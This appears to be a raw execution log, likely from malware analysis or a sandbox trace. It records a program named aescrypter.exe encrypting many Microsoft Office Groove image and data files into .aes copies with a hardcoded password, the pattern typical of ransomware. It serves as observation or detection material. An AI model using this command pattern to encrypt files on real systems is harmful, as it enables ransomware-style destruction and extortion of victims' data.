"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIcon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIcon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericonMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericonMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\DocumentShare\WSSFilesToolHomePageBackground.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\DocumentShare\WSSFilesToolHomePageBackground.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\BodyPaneBackground.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\BodyPaneBackground.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrowMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrowMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\Attachments.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\Attachments.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BREAK.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BREAK.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BUTTON.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BUTTON.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CHECKBOX.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CHECKBOX.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\COMBOBOX.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\COMBOBOX.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CONTACT.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CONTACT.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CURRENCY.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CURRENCY.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATE.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATE.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATETIME.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATETIME.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DigitalInk.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DigitalInk.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\EmbeddedView.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\EmbeddedView.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\HEADING.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\HEADING.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\IMAGE.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\IMAGE.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LINE.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LINE.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LISTBOX.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LISTBOX.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\NUMERIC.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\NUMERIC.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\PASSWORD.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\PASSWORD.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\RADIO.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\RADIO.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\SectionHeading.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\SectionHeading.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\StaticText.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\StaticText.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTAREA.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTAREA.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTBOX.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTBOX.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTVIEW.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTVIEW.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\UnformattedNumeric.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\UnformattedNumeric.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormToolImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormToolImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\GrooveFormsMetaData.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\GrooveFormsMetaData.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\ViewHeaderPreview.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\ViewHeaderPreview.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrowMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrowMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormToolImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormToolImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\ViewHeaderPreview.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\ViewHeaderPreview.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrowMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrowMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\InfoPathWelcomeImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\InfoPathWelcomeImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIcon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIcon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIconMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIconMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIcon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIcon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIconMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIconMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIcon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIcon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIconMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIconMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
